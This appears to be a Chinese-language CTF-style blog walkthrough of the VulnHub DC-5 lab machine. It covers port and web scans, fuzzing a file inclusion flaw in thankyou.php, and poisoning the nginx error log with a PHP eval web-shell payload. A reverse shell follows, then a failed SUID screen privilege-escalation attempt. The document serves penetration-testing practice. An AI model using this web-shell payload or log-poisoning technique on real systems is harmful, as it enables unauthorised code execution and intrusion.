[vulnhub] DC:5

First Post:

Last Update:

Word Count:
2.1k

Read Time:
10 min

5cf04a9ee1d4f70c20efa851896c1d440ef07f8f4a6a512376030817ec0bb6fb

简介

DC-5,开始上难度了,主要考对文件包含的理解,考在发现文件包含漏洞的存在后,该查看哪些信息,如何利用文件包含get shell。提权部分和解了。

信息收集

Port Scan:

1
2
3
4
5
6
7
8
9
10
11
12
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:37 CST
Warning: 192.168.56.114 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.114
Host is up (0.00050s latency).
Not shown: 37405 filtered tcp ports (no-response), 28127 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
49405/tcp open  unknown
MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 116.67 seconds

TCP, Service, OS Scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:39 CST
Nmap scan report for 192.168.56.114
Host is up (0.00093s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
111/tcp   open  rpcbind 2-4 (RPC #100000)
49405/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds

UDP Scan:

1
2
3
4
5
6
7
8
9
10
11
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:39 CST
Warning: 192.168.56.114 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.114
Host is up (0.0016s latency).
Not shown: 65458 open|filtered udp ports (no-response), 75 closed udp ports (port-unreach)
PORT      STATE SERVICE
111/udp   open  rpcbind
40520/udp open  unknown
MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 72.85 seconds

Simple Vuln Scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:40 CST
Nmap scan report for 192.168.56.114
Host is up (0.00022s latency).
Not shown: 998 closed tcp ports (reset)
PORT    STATE SERVICE
80/tcp  open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.114
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.114:80/contact.php
|     Form id: fname
|_    Form action: thankyou.php
111/tcp open  rpcbind
MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 74.57 seconds

nikto Vuln Scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.114
+ Target Hostname:    192.168.56.114
+ Target Port:        80
+ Start Time:         2023-06-02 20:41:49 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.6.2
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2023-06-02 20:42:12 (GMT8) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

web fingerprint Scan:

1
http://192.168.56.114 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.6.2], IP[192.168.56.114], Title[Welcome], nginx[1.6.2]

Simple Web content discovery:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jun  2 20:42:19 2023
URL_BASE: http://192.168.56.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.114/ ----
==> DIRECTORY: http://192.168.56.114/css/                                                                                                                                                  
==> DIRECTORY: http://192.168.56.114/images/                                                                                                                                               
+ http://192.168.56.114/index.php (CODE:200|SIZE:4025)                                                         
---- Entering directory: http://192.168.56.114/css/ ----
                                  
---- Entering directory: http://192.168.56.114/images/ ----
                                  
-----------------
END_TIME: Fri Jun  2 20:42:25 2023
DOWNLOADED: 13836 - FOUND: 1

dirb没啥信息就用feroxbuster再扫一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿kali)-[~/vulnhub/DC/5/workSpace]
└─$ sudo feroxbuster -u http://192.168.56.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,301,302,401,403                    

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.114
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 301, 302, 401, 403]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301      GET        7l       12w      184c http://192.168.56.114/images => http://192.168.56.114/images/
200      GET      145l      343w     2638c http://192.168.56.114/css/styles.css
200      GET       54l      560w     4292c http://192.168.56.114/about-us.php
200      GET       52l      525w     4100c http://192.168.56.114/solutions.php
200      GET       58l      752w     5645c http://192.168.56.114/faq.php
200      GET       54l      525w     4025c http://192.168.56.114/index.php
200      GET       72l      479w     4282c http://192.168.56.114/contact.php
200      GET       54l      525w     4025c http://192.168.56.114/
403      GET        7l       10w      168c http://192.168.56.114/css/
301      GET        7l       12w      184c http://192.168.56.114/css => http://192.168.56.114/css/

总计一下,最终扫出来的有用信息就是80端口跑着nginx服务搭的网站。

且目录扫描也没有太多的收获。只能死怼网站了。

web渗透

查看网页

前几个页面来回看也没有什么信息。contact页面的输入框尝试加单引号'测试SQL注入也没有什么结果。但是在来回测试其他可能的sql注入的可能时,发现thankyou.php底下的footer的年份在变化。

dc5-contact-1

dc-5-contact-2

这东西为啥会变,很奇怪。F12打开控制台发现footer部分是一个footer-warper。

dc-5-footer-wrapper

结合之前目录扫描发现的footer.php页面,我们打开footer.php页面刷新几次,发现其值确实是在变化。

dc-5-footer

这以上信息说明了什么呢?说明了thankyou.php底下肯定include了footer.php。但是,他到底什么怎么include的,是写死的还是传参的我们不得而知。因此,我们可以尝试fuzz一下,毕竟没路了,只能试试这个了。就当他是接受参数包含进去的。

文件包含

我们要fuzz两个参数:一个是接收的参数,一个是文件位置。

dc5-bp-1

我们直接用burpsuite里的intruder进行fuzz。用intruder有个好处在于它里面内置了参数以及文件遍历的字典,我们直接选pitchfork模式开始用就行。字典一变量我选的是Server-side variable names,字典二位置直接选Fuzzing - path travesal (single file)就可以。

dc5-bp-2

我们发现其确实是用的file接受参数。

那我们手动验证一下:
dc5-lfi-manual

发现非常OK。

然而,现在还有一个重大问题就是没有文件上传的地方。那我们如何拿shell?

上网查了下,发现nginx存在文件包含时可以尝试往错误日志以及访问日志写入一句话木马然后用蚁剑连接。然而,问题又来了,我们怎么知道这些日志在哪,虽然一般来说确实是在/var/log下,但是也可能放在其他地方。我们用字典枚举一下可能的地方吧,一样用的是burpsuite,不过这次用sniper模式即可,字典选Local files - Linux

dc5-errorlog

位置发现,确实是在/var/log/nginx/error.log。那我们接下来就是构造payload写入错误日志中了。

get shell

我们直接简单粗暴构造一条:

1
http://192.168.56.114/thankyou.php?file=<?php @eval($_REQUEST["shell"]); ?>

直接以一句话木马作为文件名,显然包含不到,因此就会写入到错误日志中。

验证一下:

dc5-errorlog-cat

发现确实写入了。

蚁剑连一下。

dc-5-antsword

成功连接,直接向/tmp写入一个反弹shell,然后文件包含请求一下就拿到反弹shell了。

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvp 443                   
[sudo] password for kali: 
listening on [any] 443 ...
192.168.56.114: inverse host lookup failed: Unknown host
connect to [192.168.56.144] from (UNKNOWN) [192.168.56.114] 53100
bash: cannot set terminal process group (482): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-5:~/html$

提权

上来先sudo -l,没tty,python import一下,再次sudo发现没密码。行吧。

看看set suid 的bin。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
www-data@dc-5:/etc$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs

我们在gtfobins查了一下,发现screen-4.5.0可以利用用于写文件。

然而尝试之后并没能成功利用,各种写入失败。那就找找其他的利用方式,在searchsploit搜了一下发现还真有exp。

下载下来运行失败了。查了一下网上,说是拆成三个文件然后本地编译完再传到靶机。

尝试一下发现内核版本差别太大导致靶机上运行会缺少库。然而在靶机上编译也会缺少库。搞了好久也没发现比较好的解决方案。

总之提权的思路和路径都是没错的,最后一步就当提权成功了。和解了。